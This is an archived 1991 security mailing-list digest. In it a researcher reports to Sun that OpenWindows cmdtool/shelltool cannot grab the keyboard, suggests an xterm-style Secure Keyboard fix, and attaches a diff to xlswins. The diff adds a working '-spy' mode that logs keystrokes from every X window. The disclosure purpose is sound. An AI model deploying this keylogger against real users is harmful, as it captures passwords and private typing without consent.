|
|
ARCHIVE: Core 'Security Digest' - Archives (1990 - 1991)
DOCUMENT: Core 'Security Digest' V1 #18 1991-05-31 (1 file, 2752 bytes)
SOURCE: http://securitydigest.org/exec/display?f=core/archive/118.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.
START OF DOCUMENT
Date: Fri May 31 12:54:15 PDT 1991
Subject: Core Security Digest V1 #18
Core Security Digest Volume 1 Issue 18
subject(s):
OpenWindows security problem
The unix core security mailing list is by invitation only and contains
sensitive material which SHOULD NOT BE REVEALED to non-members.
DO NOT PUT ANY LIST CONTENTS IN LOCATIONS ACCESSABLE TO NON-MEMBERS.
If you must keep copies on-line, please encrypt them at the very least.
PLEASE POST TO: core@uninet.cpd.com
PLEASE SEND EMERGENCY ALERTS TO: core-emergency@uninet.cpd.com
PLEASE SEND REQUESTS TO: core-request@uninet.cpd.com
------------------------------------------------------------------------
Date: Fri, 24 May 91 17:14:54 -0400
From: steve@umiacs.UMD.EDU (Steve D. Miller)
Subject: OpenWindows security problem
Here's a copy of something I just sent off to security-alert@sun.com. If
I had OpenWindows sources, I'd go fix this, but I don't, so... My apologies
if this is old hat to everyone, or if it's mentioned in the release notes
somewhere.
Description:
Because it seems to be impossible to tell cmdtool/shelltool to
do a keyboard grab, typing passwords or sensitive information in
an OpenWindows cmdtool or shelltool is inherently insecure.
Repeat-By:
[ Note: we use cmdtool to refer to both cmdtool and shelltool,
since they're the same program. ]
Write a program that registers an interest in keyboard events for a
cmdtool window, and that turns those events back into strings. Then
run that program against a cmdtool and go type in the cmdtool.
Watch the spy program you wrote print out what you're typing.
Next go run an xterm from MIT X11R4, run the spy program against
that window; the spy will still show you what you're typing. Now
select Secure Keyboard from the Main Options menu (ctrl-left, by
default) and type in the xterm some more; note that the spy isn't
at this point showing what you're typing.
I do have a primitive spy program that does this. I'm certainly
not an X11 guru -- this is my second or third X11 program, and
none of them have been more than about 100 lines long -- but this
still didn't take me more than an hour and a half to write. The
diffs (based on the vanilla X11R4 sources to xlswins) are at the
end of this message.
Fix:
Add the same basic type of code to cmdtool that was added to xterm.
You'll need to add a new menu entry somewhere so people can get at
the Secure Keyboard function.
It's possible that closing this hole won't really help anything, as
it occurs to me that maybe one can use the NeWS part of xnews to get
the same information. I don't know enough about either X11, NeWS,
or xnews to be able to say anything useful there, so I won't.
Yes, I know that using a real authentication protocol (or an
approximation, such as MIT-MAGIC-COOKIE-1) makes it a lot harder to
do this sort of thing. Still, it's not impossible, and besides, it
took a long time just to get the users to understand xhost, so they
probably won't understand xauth for a while yet. (-:
Spoken: Steve Miller Domain: steve@umiacs.umd.edu UUCP: uunet!mimsy!steve
Phone: +1-301-405-6736 USPS: UMIACS, Univ. of Maryland, College Park, MD 20742
[ start diffs to xlswins ]
*** old xlswins.c Fri May 24 16:54:53 1991
--- xlswins.c Fri May 24 16:54:53 1991
***************
*** 32,37 ****
--- 32,41 ----
static char *output_format = "0x%lx";
static char widget_name_buf[1024], widget_class_buf[1024];
+ #define MAX_STRING 100
+ char buffer[MAX_STRING];
+ Bool do_spy;
+
static void usage ()
{
static char *help[] = {
***************
*** 40,45 ****
--- 44,50 ----
" -indent number amount to indent per level",
" -long print a long listing",
" -resources print a listing of widget resources",
+ " -spy spy on keyboard input to all windows",
"",
NULL};
char **cpp;
***************
*** 123,128 ****
--- 128,138 ----
{
char *displayname = NULL;
Display *dpy;
+ XEvent nextevent;
+ XKeyEvent *foo = (XKeyEvent *)&nextevent;
+ KeySym keysym;
+ XComposeStatus comp;
+ int bufsiz = MAX_STRING;
Bool long_version = False;
Bool print_resources = False;
int i;
***************
*** 129,134 ****
--- 139,145 ----
int indent = 2;
ProgramName = argv[0];
+ do_spy = False;
for (i = 1; i < argc; i++) {
char *arg = argv[i];
***************
*** 149,154 ****
--- 160,168 ----
case 'r': /* -resources */
print_resources = True;
continue;
+ case 's': /* -spy */
+ do_spy = True;
+ continue;
case 'f': /* -format [odh] */
if (++i >= argc) usage ();
switch (argv[i][0]) {
***************
*** 199,204 ****
--- 213,245 ----
}
}
+ if (do_spy == True) {
+ while (1) {
+ int i, count;
+
+ XNextEvent(dpy, &nextevent);
+ if (nextevent.type == KeyPress) {
+ count = XLookupString(&nextevent, buffer, bufsiz,
+ &keysym, &comp);
+ buffer[count] = '\0';
+ printf("in window %x got: ", foo->window);
+ for (i = 0 ; i < count ; i++) {
+ if (buffer[i] & 0x80) {
+ putchar('~');
+ buffer[i] &= 0x7f;
+ }
+ if (buffer[i] < ' ') {
+ putchar('^');
+ buffer[i] |= 0x40;
+ }
+ putchar(buffer[i]);
+ }
+ putchar('\n');
+ fflush(stdout);
+ }
+ }
+ }
+
XCloseDisplay (dpy);
exit (0);
}
***************
*** 279,284 ****
--- 320,327 ----
if (got_xerror) goto done;
+ if (do_spy == True)
+ XSelectInput(dpy, w, KeyPressMask);
if (!XQueryTree (dpy, w, &root, &parent, &children, &nchildren))
goto done;
------------------------------------------------------------------------
End of Core Security Digest Volume 1 Issue 18
**********************
END OF DOCUMENT
| ISSN 1742-948X 01 (Online) | 2005/03/01 | Copyright 2002-2008 securitydigest.org. All rights reserved. |